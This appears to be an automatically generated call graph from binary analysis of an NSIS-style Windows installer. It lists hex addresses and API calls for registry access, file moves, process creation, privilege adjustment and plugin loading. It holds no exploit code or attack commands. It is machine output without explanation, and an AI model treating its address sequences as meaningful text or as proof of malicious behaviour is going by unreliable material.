4026fd 4958->4961 4960 40273c 4959->4960 4959->4961 4963 405da0 lstrcpynA 4960->4963 4963->4961 4964 40166a 4965 402ace 18 API calls 4964->4965 4966 401671 4965->4966 4967 402ace 18 API calls 4966->4967 4968 40167a 4967->4968 4969 402ace 18 API calls 4968->4969 4970 401683 MoveFileA 4969->4970 4971 401696 4970->4971 4972 40168f 4970->4972 4974 4060a4 2 API calls 4971->4974 4976 402238 4971->4976 4973 401423 25 API calls 4972->4973 4973->4976 4975 4016a5 4974->4975 4975->4976 4977 405c5b 38 API calls 4975->4977 4977->4972 4978 4019ed 4979 402ace 18 API calls 4978->4979 4980 4019f4 4979->4980 4981 402ace 18 API calls 4980->4981 4982 4019fd 4981->4982 4983 401a04 lstrcmpiA 4982->4983 4984 401a16 lstrcmpA 4982->4984 4985 401a0a 4983->4985 4984->4985 4986 40256e 4987 402ace 18 API calls 4986->4987 4988 402575 4987->4988 4991 405a13 GetFileAttributesA CreateFileA 4988->4991 4990 402581 4991->4990 4269 4022f2 4270 4022fa 4269->4270 4275 402300 4269->4275 4271 402ace 18 API calls 4270->4271 4271->4275 4272 402ace 18 API calls 4274 402310 4272->4274 4273 40231e 4277 402ace 18 API calls 4273->4277 4274->4273 4276 402ace 18 API calls 4274->4276 4275->4272 4275->4274 4276->4273 4278 402327 WritePrivateProfileStringA 4277->4278 4992 100015b3 4993 100014bb GlobalFree 4992->4993 4995 100015cb 4993->4995 4994 10001611 GlobalFree 4995->4994 4996 100015e6 4995->4996 4997 100015fd VirtualFree 4995->4997 4996->4994 4997->4994 4998 4014f4 SetForegroundWindow 4999 40295e 4998->4999 5000 401cf5 5001 402aac 18 API calls 5000->5001 5002 401cfc 5001->5002 5003 402aac 18 API calls 5002->5003 5004 401d08 GetDlgItem 5003->5004 5005 40258a 5004->5005 5006 4024f5 5007 402bd8 19 API calls 5006->5007 5008 4024ff 5007->5008 5009 402aac 18 API calls 5008->5009 5010 402508 5009->5010 5011 402523 RegEnumKeyA 5010->5011 5012 40252f RegEnumValueA 5010->5012 5013 402729 5010->5013 5014 402548 RegCloseKey 5011->5014 5012->5013 5012->5014 5014->5013 4344 402377 4345 4023a7 4344->4345 4346 40237c 4344->4346 4347 402ace 18 API calls 4345->4347 4348 402bd8 19 API calls 4346->4348 4351 4023ae 4347->4351 4349 402383 4348->4349 4350 40238d 4349->4350 4353 4023c4 4349->4353 4352 402ace 18 API calls 4350->4352 4356 402b0e RegOpenKeyExA 4351->4356 4354 402394 RegDeleteValueA RegCloseKey 4352->4354 4354->4353 4357 402ba2 4356->4357 4361 402b39 4356->4361 4357->4353 4358 402b5f RegEnumKeyA 4359 402b71 RegCloseKey 4358->4359 4358->4361 4362 406139 5 API calls 4359->4362 4360 402b96 RegCloseKey 4365 402b85 4360->4365 4361->4358 4361->4359 4361->4360 4363 402b0e 5 API calls 4361->4363 4364 402b81 4362->4364 4363->4361 4364->4365 4366 402bb1 RegDeleteKeyA 4364->4366 4365->4357 4366->4365 5016 4050f7 5017 4052a2 5016->5017 5018 405119 GetDlgItem GetDlgItem GetDlgItem 5016->5018 5019 4052d2 5017->5019 5020 4052aa GetDlgItem CreateThread CloseHandle 5017->5020 5061 403fba SendMessageA 5018->5061 5023 405300 5019->5023 5024 405321 5019->5024 5025 4052e8 ShowWindow ShowWindow 5019->5025 5020->5019 5022 405189 5026 405190 GetClientRect GetSystemMetrics SendMessageA SendMessageA 5022->5026 5027 40535b 5023->5027 5029 405310 5023->5029 5030 405334 ShowWindow 5023->5030 5031 403fec 8 API calls 5024->5031 5063 403fba SendMessageA 5025->5063 5032 4051e2 SendMessageA SendMessageA 5026->5032 5033 4051fe 5026->5033 5027->5024 5034 405368 SendMessageA 5027->5034 5064 403f5e 5029->5064 5037 405354 5030->5037 5038 405346 5030->5038 5036 40532d 5031->5036 5032->5033 5040 405211 5033->5040 5041 405203 SendMessageA 5033->5041 5034->5036 5042 405381 CreatePopupMenu 5034->5042 5039 403f5e SendMessageA 5037->5039 5043 404fb9 25 API calls 5038->5043 5039->5027 5045 403f85 19 API calls 5040->5045 5041->5040 5044 405dc2 18 API calls 5042->5044 5043->5037 5046 405391 AppendMenuA 5044->5046 5047 405221 5045->5047 5048 4053c2 TrackPopupMenu 5046->5048 5049 4053af GetWindowRect 5046->5049 5050 40522a ShowWindow 5047->5050 5051 40525e GetDlgItem SendMessageA 5047->5051 5048->5036 5052 4053de 5048->5052 5049->5048 5053 405240 ShowWindow 5050->5053 5056 40524d 5050->5056 5051->5036 5054 405285 SendMessageA SendMessageA 5051->5054 5055 4053fd SendMessageA 5052->5055 5053->5056 5054->5036 5055->5055 5057 40541a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5055->5057 5062 403fba SendMessageA 5056->5062 5059 40543c SendMessageA 5057->5059 5059->5059 5060 40545e GlobalUnlock SetClipboardData CloseClipboard 5059->5060 5060->5036 5061->5022 5062->5051 5063->5023 5065 403f65 5064->5065 5066 403f6b SendMessageA 5064->5066 5065->5066 5066->5024 5067 40437c 5068 4043b2 5067->5068 5069 40438c 5067->5069 5071 403fec 8 API calls 5068->5071 5070 403f85 19 API calls 5069->5070 5072 404399 SetDlgItemTextA 5070->5072 5073 4043be 5071->5073 5072->5068 5074 1000103d 5075 1000101b 5 API calls 5074->5075 5076 10001056 5075->5076 5077 4018fd 5078 401934 5077->5078 5079 402ace 18 API calls 5078->5079 5080 401939 5079->5080 5081 405642 69 API calls 5080->5081 5082 401942 5081->5082 4442 401fff 4443 402011 4442->4443 4453 4020bf 4442->4453 4444 402ace 18 API calls 4443->4444 4446 402018 4444->4446 4445 401423 25 API calls 4451 402238 4445->4451 4447 402ace 18 API calls 4446->4447 4448 402021 4447->4448 4449 402036 LoadLibraryExA 4448->4449 4450 402029 GetModuleHandleA 4448->4450 4452 402046 GetProcAddress 4449->4452 4449->4453 4450->4449 4450->4452 4454 402092 4452->4454 4455 402055 4452->4455 4453->4445 4456 404fb9 25 API calls 4454->4456 4457 402074 4455->4457 4458 40205d 4455->4458 4459 402065 4456->4459 4463 100016bd 4457->4463 4460 401423 25 API calls 4458->4460 4459->4451 4461 4020b3 FreeLibrary 4459->4461 4460->4459 4461->4451 4464 100016ed 4463->4464 4505 10001a5d 4464->4505 4466 1000180a 4466->4459 4467 100016f4 4467->4466 4468 10001705 4467->4468 4469 1000170c 4467->4469 4554 100021b0 4468->4554 4537 100021fa 4469->4537 4474 10001770 4480 100017b2 4474->4480 4481 10001776 4474->4481 4475 10001752 4567 100023da 4475->4567 4476 10001722 4479 10001728 4476->4479 4483 10001733 4476->4483 4477 1000173b 4489 10001731 4477->4489 4564 10002aa3 4477->4564 4479->4489 4548 100027e8 4479->4548 4487 100023da 11 API calls 4480->4487 4485 10001559 3 API calls 4481->4485 4482 10001758 4578 10001559 4482->4578 4558 10002589 4483->4558 4491 1000178c 4485->4491 4492 100017a4 4487->4492 4489->4474 4489->4475 4495 100023da 11 API calls 4491->4495 4496 100017f9 4492->4496 4589 100023a0 4492->4589 4494 10001739 4494->4489 4495->4492 4496->4466 4500 10001803 GlobalFree 4496->4500 4500->4466 4502 100017e5 4502->4496 4593 100014e2 wsprintfA 4502->4593 4503 100017de FreeLibrary 4503->4502 4596 10001215 GlobalAlloc 4505->4596 4507 10001a81 4597 10001215 GlobalAlloc 4507->4597 4509 10001cbb GlobalFree GlobalFree GlobalFree 4510 10001cd8 4509->4510 4525 10001d22 4509->4525 4511 1000201a 4510->4511 4518 10001ced 4510->4518 4510->4525 4513 1000203c GetModuleHandleA 4511->4513 4511->4525 4512 10001b60 GlobalAlloc 4532 10001a8c 4512->4532 4516 10002062 4513->4516 4517 1000204d LoadLibraryA 4513->4517 4514 10001bab lstrcpyA 4519 10001bb5 lstrcpyA 4514->4519 4515 10001bc9 GlobalFree 4515->4532 4604 100015a4 GetProcAddress 4516->4604 4517->4516 4517->4525 4518->4525 4600 10001224 4518->4600 4519->4532 4521 100020b3 4522 100020c0 lstrlenA 4521->4522 4521->4525 4605 100015a4 GetProcAddress 4522->4605 4524 10001f7a 4524->4525 4529 10001fbe lstrcpyA 4524->4529 4525->4467 4526 10002074 4526->4521 4536 1000209d GetProcAddress 4526->4536 4529->4525 4530 10001e75 GlobalFree 4530->4532 4531 100020d9 4531->4525 4532->4509 4532->4512 4532->4514 4532->4515 4532->4519 4532->4524 4532->4525 4532->4530 4533 10001c07 4532->4533 4534 10001224 2 API calls 4532->4534 4603 10001215 GlobalAlloc 4532->4603 4533->4532 4598 10001534 GlobalSize GlobalAlloc 4533->4598 4534->4532 4536->4521 4543 10002212 4537->4543 4539 10002349 GlobalFree 4540 10001712 4539->4540 4539->4543 4540->4476 4540->4477 4540->4489 4541 100022b9 GlobalAlloc MultiByteToWideChar 4545 10002303 4541->4545 4546 100022e3 GlobalAlloc CLSIDFromString GlobalFree 4541->4546 4542 1000230a lstrlenA 4542->4539 4542->4545 4543->4539 4543->4541 4543->4542 4544 10001224 GlobalAlloc lstrcpynA 4543->4544 4607 100012ad 4543->4607 4544->4543 4545->4539 4611 1000251d 4545->4611 4546->4539 4550 100027fa 4548->4550 4549 1000289f VirtualAllocEx 4551 100028bd 4549->4551 4550->4549 4552 100029b9 4551->4552 4553 100029ae GetLastError 4551->4553 4552->4489 4553->4552 4555 100021c0 4554->4555 4556 1000170b 4554->4556 4555->4556 4557 100021d2 GlobalAlloc 4555->4557 4556->4469 4557->4555 4562 100025a5 4558->4562 4559 100025f6 GlobalAlloc 4563 10002618 4559->4563 4560 10002609 4561 1000260e GlobalSize 4560->4561 4560->4563 4561->4563 4562->4559 4562->4560 4563->4494 4565 10002aae 4564->4565 4566 10002aee GlobalFree 4565->4566 4614 10001215 GlobalAlloc 4567->4614 4569 1000243a lstrcpynA 4575 100023e6 4569->4575 4570 1000244b StringFromGUID2 WideCharToMultiByte 4570->4575 4571 1000246f WideCharToMultiByte 4571->4575 4572 10002490 wsprintfA 4572->4575 4573 100024b4 GlobalFree 4573->4575 4574 100024ee GlobalFree 4574->4482 4575->4569 4575->4570 4575->4571 4575->4572 4575->4573 4575->4574 4576 10001266 2 API calls 4575->4576 4615 100012d1 4575->4615 4576->4575 4619 10001215 GlobalAlloc 4578->4619 4580 1000155f 4582 10001586 4580->4582 4583 1000156c lstrcpyA 4580->4583 4584 100015a0 4582->4584 4585 1000158b wsprintfA 4582->4585 4583->4584 4586 10001266 4584->4586 4585->4584 4587 100012a8 GlobalFree 4586->4587 4588 1000126f GlobalAlloc lstrcpynA 4586->4588 4587->4492 4588->4587 4590 100017c5 4589->4590 4591 100023ae 4589->4591 4590->4502 4590->4503 4591->4590 4592 100023c7 GlobalFree 4591->4592 4592->4591 4594 10001266 2 API calls 4593->4594 4595 10001503 4594->4595 4595->4496 4596->4507 4597->4532 4599 10001552 4598->4599 4599->4533 4606 10001215 GlobalAlloc 4600->4606 4602 10001233 lstrcpynA 4602->4525 4603->4532 4604->4526 4605->4531 4606->4602 4608 100012b4 4607->4608 4609 10001224 2 API calls 4608->4609 4610 100012cf 4609->4610 4610->4543 4612 10002581 4611->4612 4613 1000252b VirtualAlloc 4611->4613 4612->4545 4613->4612 4614->4575 4616 100012f9 4615->4616 4617 100012da 4615->4617 4616->4575 4617->4616 4618 100012e0 lstrcpyA 4617->4618 4618->4616 4619->4580 3753 403180 SetErrorMode GetVersion 3754 4031b7 3753->3754 3755 4031bd 3753->3755 3756 406139 5 API calls 3754->3756 3841 4060cb GetSystemDirectoryA 3755->3841 3756->3755 3758 4031d3 lstrlenA 3758->3755 3759 4031e2 3758->3759 3844 406139 GetModuleHandleA 3759->3844 3762 406139 5 API calls 3763 4031f1 #17 OleInitialize SHGetFileInfoA 3762->3763 3850 405da0 lstrcpynA 3763->3850 3765 40322e GetCommandLineA 3851 405da0 lstrcpynA 3765->3851 3767 403240 GetModuleHandleA 3768 403257 3767->3768 3852 40583d 3768->3852 3771 403345 3772 403358 GetTempPathA 3771->3772 3856 40314f 3772->3856 3774 403370 3775 403374 GetWindowsDirectoryA lstrcatA 3774->3775 3776 4033ca DeleteFileA 3774->3776 3778 40314f 12 API calls 3775->3778 3866 402cfa GetTickCount GetModuleFileNameA 3776->3866 3777 40583d CharNextA 3779 40327b 3777->3779 3781 403390 3778->3781 3779->3771 3779->3777 3782 403347 3779->3782 3781->3776 3784 403394 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3781->3784 3951 405da0 lstrcpynA 3782->3951 3783 4033de 3790 40583d CharNextA 3783->3790 3823 403464 3783->3823 3836 403474 3783->3836 3786 40314f 12 API calls 3784->3786 3788 4033c2 3786->3788 3788->3776 3788->3836 3792 4033f9 3790->3792 3800 4034a4 3792->3800 3801 40343f 3792->3801 3793 4035ac 3796 4035b4 GetCurrentProcess OpenProcessToken 3793->3796 3797 40362e ExitProcess 3793->3797 3794 40348e 3975 405596 3794->3975 3802 4035ff 3796->3802 3803 4035cf LookupPrivilegeValueA AdjustTokenPrivileges 3796->3803 3979 405519 3800->3979 3952 405900 3801->3952 3806 406139 5 API calls 3802->3806 3803->3802 3809 403606 3806->3809 3812 40361b ExitWindowsEx 3809->3812 3815 403627 3809->3815 3810 4034c5 lstrcatA lstrcmpiA 3814 4034e1 3810->3814 3810->3836 3811 4034ba lstrcatA 3811->3810 3812->3797 3812->3815 3817 4034e6 3814->3817 3818 4034ed 3814->3818 4017 40140b 3815->4017 3816 403459 3967 405da0 lstrcpynA 3816->3967 3982 40547f CreateDirectoryA 3817->3982 3987 4054fc CreateDirectoryA 3818->3987 3894 403720 3823->3894 3825 4034f2 SetCurrentDirectoryA 3826 403501 3825->3826 3827 40350c 3825->3827 3990 405da0 lstrcpynA 3826->3990 3991 405da0 lstrcpynA 3827->3991 3832 403558 CopyFileA 3838 40351a 3832->3838 3833 4035a0 3834 405c5b 38 API calls 3833->3834 3834->3836 3968 403646 3836->3968 3837 405dc2 18 API calls 3837->3838 3838->3833 3838->3837 3840 40358c CloseHandle 3838->3840 3992 405dc2 3838->3992 4010 405c5b MoveFileExA 3838->4010 4014 405531 CreateProcessA 3838->4014 3840->3838 3843 4060ed wsprintfA LoadLibraryExA 3841->3843 3843->3758 3845 406155 3844->3845 3846 40615f GetProcAddress 3844->3846 3847 4060cb 3 API calls 3845->3847 3848 4031ea 3846->3848 3849 40615b 3847->3849 3848->3762 3849->3846 3849->3848 3850->3765 3851->3767 3853 405843 3852->3853 3854 40326b CharNextA 3853->3854 3855 405849 CharNextA 3853->3855 3854->3779 3855->3853 4020 40600b 3856->4020 3858 403165 3858->3774 3859 40315b 3859->3858 4029 405812 lstrlenA CharPrevA 3859->4029 3862 4054fc 2 API calls 3863 403173 3862->3863 4032 405a42 3863->4032 4036 405a13 GetFileAttributesA CreateFileA 3866->4036 3868 402d3a 3869 402d4a 3868->3869 4037 405da0 lstrcpynA 3868->4037 3869->3783 3871 402d60 4038 405859 lstrlenA 3871->4038 3875 402d71 GetFileSize 3876 402d88 3875->3876 3891 402e6d 3875->3891 3876->3869 3881 402ed9 3876->3881 3889 402c96 6 API calls 3876->3889 3876->3891 4075 403122 3876->4075 3878 402e76 3878->3869 3880 402ea6 GlobalAlloc 3878->3880 4078 403138 SetFilePointer 3878->4078 4054 403138 SetFilePointer 3880->4054 3885 402c96 6 API calls 3881->3885 3884 402ec1 4055 402f33 3884->4055 3885->3869 3886 402e8f 3888 403122 ReadFile 3886->3888 3890 402e9a 3888->3890 3889->3876 3890->3869 3890->3880 4043 402c96 3891->4043 3892 402ecd 3892->3869 3892->3892 3893 402f0a SetFilePointer 3892->3893 3893->3869 3895 406139 5 API calls 3894->3895 3896 403734 3895->3896 3897 40373a 3896->3897 3898 40374c 3896->3898 4108 405cfe wsprintfA 3897->4108 4109 405c87 RegOpenKeyExA 3898->4109 3901 403795 lstrcatA 3904 40374a 3901->3904 3903 405c87 3 API calls 3903->3901 4099 4039e5 3904->4099 3907 405900 18 API calls 3908 4037c7 3907->3908 3909 403850 3908->3909 3911 405c87 3 API calls 3908->3911 3910 405900 18 API calls 3909->3910 3912 403856 3910->3912 3913 4037f3 3911->3913 3914 403866 LoadImageA 3912->3914 3915 405dc2 18 API calls 3912->3915 3913->3909 3920 40380f lstrlenA 3913->3920 3921 40583d CharNextA 3913->3921 3916 40390c 3914->3916 3917 40388d RegisterClassA 3914->3917 3915->3914 3919 40140b 2 API calls 3916->3919 3918 4038c3 SystemParametersInfoA CreateWindowExA 3917->3918 3950 403916 3917->3950 3918->3916 3924 403912 3919->3924 3922 403843 3920->3922 3923 40381d lstrcmpiA 3920->3923 3925 40380d 3921->3925 3927 405812 3 API calls 3922->3927 3923->3922 3926 40382d GetFileAttributesA 3923->3926 3929 4039e5 19 API calls 3924->3929 3924->3950 3925->3920 3928 403839 3926->3928 3930 403849 3927->3930 3928->3922 3931 405859 2 API calls 3928->3931 3932 403923 3929->3932 4114 405da0 lstrcpynA 3930->4114 3931->3922 3934 4039b2 3932->3934 3935 40392f ShowWindow 3932->3935 4115 40508b OleInitialize 3934->4115 3937 4060cb 3 API calls 3935->3937 3939 403947 3937->3939 3938 4039b8 3940 4039d4 3938->3940 3941 4039bc 3938->3941 3942 403955 GetClassInfoA 3939->3942 3946 4060cb 3 API calls 3939->3946 3945 40140b 2 API calls 3940->3945 3948 40140b 2 API calls 3941->3948 3941->3950 3943 403969 GetClassInfoA RegisterClassA 3942->3943 3944 40397f DialogBoxParamA 3942->3944 3943->3944 3947 40140b 2 API calls 3944->3947 3945->3950 3946->3942 3949 4039a7 3947->3949 3948->3950 3949->3950 3950->3836 3951->3772 4130 405da0 lstrcpynA 3952->4130 3954 405911 4131 4058ab CharNextA CharNextA 3954->4131 3957 40344a 3957->3836 3966 405da0 lstrcpynA 3957->3966 3958 40600b 5 API calls 3964 405927 3958->3964 3959 405952 lstrlenA 3960 40595d 3959->3960 3959->3964 3961 405812 3 API calls 3960->3961 3963 405962 GetFileAttributesA 3961->3963 3963->3957 3964->3957 3964->3959 3965 405859 2 API calls 3964->3965 4137 4060a4 FindFirstFileA 3964->4137 3965->3959 3966->3816 3967->3823 3969 403650 CloseHandle 3968->3969 3970 40365e 3968->3970 3969->3970 4140 40368b 3970->4140 3976 4055ab 3975->3976 3977 40349c ExitProcess 3976->3977 3978 4055bf MessageBoxIndirectA 3976->3978 3978->3977 3980 406139 5 API calls 3979->3980 3981 4034a9 lstrcatA 3980->3981 3981->3810 3981->3811 3983 4054d0 GetLastError 3982->3983 3984 4034eb 3982->3984 3983->3984 3985 4054df SetFileSecurityA 3983->3985 3984->3825 3985->3984 3986 4054f5 GetLastError 3985->3986 3986->3984 3988 405510 GetLastError 3987->3988 3989 40550c 3987->3989 3988->3989 3989->3825 3990->3827 3991->3838 3993 405dcf 3992->3993 3994 405ff2 3993->3994 3997 405e70 GetVersion 3993->3997 3998 405fc9 lstrlenA 3993->3998 4001 405dc2 10 API calls 3993->4001 4002 405ee8 GetSystemDirectoryA 3993->4002 4003 405c87 3 API calls 3993->4003 4004 405efb GetWindowsDirectoryA 3993->4004 4005 40600b 5 API calls 3993->4005 4006 405f2f SHGetSpecialFolderLocation 3993->4006 4007 405dc2 10 API calls 3993->4007 4008 405f72 lstrcatA 3993->4008 4197 405cfe wsprintfA 3993->4197 4198 405da0 lstrcpynA 3993->4198 3995 40354b DeleteFileA 3994->3995 4199 405da0 lstrcpynA 3994->4199 3995->3832 3995->3838 3997->3993 3998->3993 4001->3998 4002->3993 4003->3993 4004->3993 4005->3993 4006->3993 4009 405f47 SHGetPathFromIDListA CoTaskMemFree 4006->4009 4007->3993 4008->3993 4009->3993 4011 405c7c 4010->4011 4012 405c6f 4010->4012 4011->3838 4200 405ae9 lstrcpyA 4012->4200 4015 405570 4014->4015 4016 405564 CloseHandle 4014->4016 4015->3838 4016->4015 4018 401389 2 API calls 4017->4018 4019 401420 4018->4019 4019->3797 4026 406017 4020->4026 4021 406083 CharPrevA 4022 40607f 4021->4022 4022->4021 4025 40609e 4022->4025 4023 406074 CharNextA 4023->4022 4023->4026 4024 40583d CharNextA 4024->4026 4025->3859 4026->4022 4026->4023 4026->4024 4027 406062 CharNextA 4026->4027 4028 40606f CharNextA 4026->4028 4027->4026 4028->4023 4030 40316d 4029->4030 4031 40582c lstrcatA 4029->4031 4030->3862 4031->4030 4033 405a4d GetTickCount GetTempFileNameA 4032->4033 4034 40317e 4033->4034 4035 405a7a 4033->4035 4034->3774 4035->4033 4035->4034 4036->3868 4037->3871 4039 405866 4038->4039 4040 402d66 4039->4040 4041 40586b CharPrevA 4039->4041 4042 405da0 lstrcpynA 4040->4042 4041->4039 4041->4040 4042->3875 4044 402cb7 4043->4044 4045 402c9f 4043->4045 4048 402cc7 GetTickCount 4044->4048 4049 402cbf 4044->4049 4046 402ca8 DestroyWindow 4045->4046 4047 402caf 4045->4047 4046->4047 4047->3878 4051 402cd5 CreateDialogParamA ShowWindow 4048->4051 4052 402cf8 4048->4052 4079 406175 4049->4079 4051->4052 4052->3878 4054->3884 4056 402f49 4055->4056 4057 402f77 4056->4057 4085 403138 SetFilePointer 4056->4085 4059 403122 ReadFile 4057->4059 4060 402f82 4059->4060 4061 402f94 GetTickCount 4060->4061 4062 4030bb 4060->4062 4064 4030a5 4060->4064 4061->4064 4071 402fc0 4061->4071 4063 4030fd 4062->4063 4068 4030bf 4062->4068 4066 403122 ReadFile 4063->4066 4064->3892 4065 403122 ReadFile 4065->4071 4066->4064 4067 403122 ReadFile 4067->4068 4068->4064 4068->4067 4069 405aba WriteFile 4068->4069 4069->4068 4070 403016 GetTickCount 4070->4071 4071->4064 4071->4065 4071->4070 4072 40303b MulDiv wsprintfA 4071->4072 4083 405aba WriteFile 4071->4083 4086 404fb9 4072->4086 4097 405a8b ReadFile 4075->4097 4078->3886 4080 406192 PeekMessageA 4079->4080 4081 402cc5 4080->4081 4082 406188 DispatchMessageA 4080->4082 4081->3878 4082->4080 4084 405ad8 4083->4084 4084->4071 4085->4057 4087 404fd4 4086->4087 4096 405077 4086->4096 4088 404ff1 lstrlenA 4087->4088 4089 405dc2 18 API calls 4087->4089 4090 40501a 4088->4090 4091 404fff lstrlenA 4088->4091 4089->4088 4093 405020 SetWindowTextA 4090->4093 4094 40502d 4090->4094 4092 405011 lstrcatA 4091->4092 4091->4096 4092->4090 4093->4094 4095 405033 SendMessageA SendMessageA SendMessageA 4094->4095 4094->4096 4095->4096 4096->4071 4098 403135 4097->4098 4098->3876 4100 4039f9 4099->4100 4122 405cfe wsprintfA 4100->4122 4102 403a6a 4103 405dc2 18 API calls 4102->4103 4104 403a76 SetWindowTextA 4103->4104 4105 403a92 4104->4105 4106 4037a5 4104->4106 4105->4106 4107 405dc2 18 API calls 4105->4107 4106->3907 4107->4105 4108->3904 4110 403777 4109->4110 4111 405cba RegQueryValueExA 4109->4111 4110->3901 4110->3903 4112 405cdb RegCloseKey 4111->4112 4112->4110 4114->3909 4123 403fd1 4115->4123 4117 4050ae 4121 4050d5 4117->4121 4126 401389 4117->4126 4118 403fd1 SendMessageA 4119 4050e7 OleUninitialize 4118->4119 4119->3938 4121->4118 4122->4102 4124 403fe9 4123->4124 4125 403fda SendMessageA 4123->4125 4124->4117 4125->4124 4128 401390 4126->4128 4127 4013fe 4127->4117 4128->4127 4129 4013cb MulDiv SendMessageA 4128->4129 4129->4128 4130->3954 4132 4058d6 4131->4132 4133 4058c6 4131->4133 4135 40583d CharNextA 4132->4135 4136 4058f6 4132->4136 4133->4132 4134 4058d1 CharNextA 4133->4134 4134->4136 4135->4132 4136->3957 4136->3958 4138 4060c5 4137->4138 4139 4060ba FindClose 4137->4139 4138->3964 4139->4138 4142 403699 4140->4142 4141 403663 4144 405642 4141->4144 4142->4141 4143 40369e FreeLibrary GlobalFree 4142->4143 4143->4141 4143->4143 4145 405900 18 API calls 4144->4145 4146 405662 4145->4146 4147 405681 4146->4147 4148 40566a DeleteFileA 4146->4148 4150 4057b9 4147->4150 4184 405da0 lstrcpynA 4147->4184 4149 40347d OleUninitialize 4148->4149 4149->3793 4149->3794 4150->4149 4155 4060a4 2 API calls 4150->4155 4152 4056a7 4153 4056ba 4152->4153 4154 4056ad lstrcatA 4152->4154 4157 405859 2 API calls 4153->4157 4156 4056c0 4154->4156 4158 4057d3 4155->4158 4159 4056ce lstrcatA 4156->4159 4161 4056d9 lstrlenA FindFirstFileA 4156->4161 4157->4156 4158->4149 4160 4057d7 4158->4160 4159->4161 4162 405812 3 API calls 4160->4162 4163 4057af 4161->4163 4182 4056fd 4161->4182 4164 4057dd 4162->4164 4163->4150 4166 4055fa 5 API calls 4164->4166 4165 40583d CharNextA 4165->4182 4167 4057e9 4166->4167 4168 405803 4167->4168 4169 4057ed 4167->4169 4172 404fb9 25 API calls 4168->4172 4169->4149 4174 404fb9 25 API calls 4169->4174 4170 40578e FindNextFileA 4173 4057a6 FindClose 4170->4173 4170->4182 4172->4149 4173->4163 4175 4057fa 4174->4175 4176 405c5b 38 API calls 4175->4176 4179 405801 4176->4179 4178 405642 62 API calls 4178->4182 4179->4149 4180 404fb9 25 API calls 4180->4170 4181 404fb9 25 API calls 4181->4182 4182->4165 4182->4170 4182->4178 4182->4180 4182->4181 4183 405c5b 38 API calls 4182->4183 4185 405da0 lstrcpynA 4182->4185 4186 4055fa 4182->4186 4183->4182 4184->4152 4185->4182 4194 4059ee GetFileAttributesA 4186->4194 4189 405615 RemoveDirectoryA 4191 405623 4189->4191 4190 40561d DeleteFileA 4190->4191 4192 405627 4191->4192 4193 405633 SetFileAttributesA 4191->4193 4192->4182 4193->4192 4195 405a00 SetFileAttributesA 4194->4195 4196 405606 4194->4196 4195->4196 4196->4189 4196->4190 4196->4192 4197->3993 4198->3993 4199->3995 4201 405b11 4200->4201 4202 405b37 GetShortPathNameA 4200->4202 4227 405a13 GetFileAttributesA CreateFileA 4201->4227 4203 405c56 4202->4203 4204 405b4c 4202->4204 4203->4011 4204->4203 4206 405b54 wsprintfA 4204->4206 4208 405dc2 18 API calls 4206->4208 4207 405b1b CloseHandle GetShortPathNameA 4207->4203 4209 405b2f 4207->4209 4210 405b7c 4208->4210 4209->4202 4209->4203 4228 405a13 GetFileAttributesA CreateFileA 4210->4228 4212 405b89 4212->4203 4213 405b98 GetFileSize GlobalAlloc 4212->4213 4214 405bba 4213->4214 4215 405c4f CloseHandle 4213->4215 4216 405a8b ReadFile 4214->4216 4215->4203 4217 405bc2 4216->4217 4217->4215 4229 405978 lstrlenA 4217->4229 4220 405bd9 lstrcpyA 4223 405bfb 4220->4223 4221 405bed 4222 405978 4 API calls 4221->4222 4222->4223 4224 405c32 SetFilePointer 4223->4224 4225 405aba WriteFile 4224->4225 4226 405c48 GlobalFree 4225->4226 4226->4215 4227->4207 4228->4212 4230 4059b9 lstrlenA 4229->4230 4231 405992 lstrcmpiA 4230->4231 4233 4059c1 4230->4233 4232 4059b0 CharNextA 4231->4232 4231->4233 4232->4230 4233->4220 4233->4221 5083 401000 5084 401037 BeginPaint GetClientRect 5083->5084 5085 40100c DefWindowProcA 5083->5085 5087 4010f3 5084->5087 5088 401179 5085->5088 5089 401073 CreateBrushIndirect FillRect DeleteObject 5087->5089 5090 4010fc 5087->5090 5089->5087 5091 401102 CreateFontIndirectA 5090->5091 5092 401167 EndPaint 5090->5092 5091->5092 5093 401112 6 API calls 5091->5093 5092->5088 5093->5092 5094 401900 5095 402ace 18 API calls 5094->5095 5096 401907 5095->5096 5097 405596 MessageBoxIndirectA 5096->5097 5098 401910 5097->5098 5099 401502 5100 40150a 5099->5100 5102 40151d 5099->5102 5101 402aac 18 API calls 5100->5101 5101->5102 4234 402483 4245 402bd8 4234->4245 4236 40248d 4249 402ace 4236->4249 4239 4024a0 RegQueryValueExA 4241 4024c0 4239->4241 4242 4024c6 RegCloseKey 4239->4242 4240 402729 4241->4242 4255 405cfe wsprintfA 4241->4255 4242->4240 4246 402ace 18 API calls 4245->4246 4247 402bf1 4246->4247 4248 402bff RegOpenKeyExA 4247->4248 4248->4236 4250 402ada 4249->4250 4251 405dc2 18 API calls 4250->4251 4252 402afb 4251->4252 4253 402496 4252->4253 4254 40600b 5 API calls 4252->4254 4253->4239 4253->4240 4254->4253 4255->4242 5103 100029c3 5104 100029db 5103->5104 5105 10001534 2 API calls 5104->5105 5106 100029f6 5105->5106 5107 401c04 5108 402aac 18 API calls 5107->5108 5109 401c0b 5108->5109 5110 402aac 18 API calls 5109->5110 5111 401c18 5110->5111 5112 401c2d 5111->5112 5113 402ace 18 API calls 5111->5113 5114 401c3d 5112->5114 5115 402ace 18 API calls 5112->5115 5113->5112 5116 401c94 5114->5116 5117 401c48 5114->5117 5115->5114 5119 402ace 18 API calls 5116->5119 5118 402aac 18 API calls 5117->5118 5120 401c4d 5118->5120 5121 401c99 5119->5121 5122 402aac 18 API calls 5120->5122 5123 402ace 18 API calls 5121->5123 5124 401c59 5122->5124 5125 401ca2 FindWindowExA 5123->5125 5126 401c84 SendMessageA 5124->5126 5127 401c66 SendMessageTimeoutA 5124->5127 5128 401cc0 5125->5128 5126->5128 5127->5128 4262 401389 4264 401390 4262->4264 4263 4013fe 4264->4263 4265 4013cb MulDiv SendMessageA 4264->4265 4265->4264 5129 40270b 5130 402ace 18 API calls 5129->5130 5131 402712 FindFirstFileA 5130->5131 5132 402735 5131->5132 5136 402725 5131->5136 5133 40273c 5132->5133 5137 405cfe wsprintfA 5132->5137 5138 405da0 lstrcpynA 5133->5138 5137->5133 5138->5136 5139 401490 5140 404fb9 25 API calls 5139->5140 5141 401497 5140->5141 5142 402590 5143 402595 5142->5143 5144 4025a9 5142->5144 5145 402aac 18 API calls 5143->5145 5146 402ace 18 API calls 5144->5146 5148 40259e 5145->5148 5147 4025b0 lstrlenA 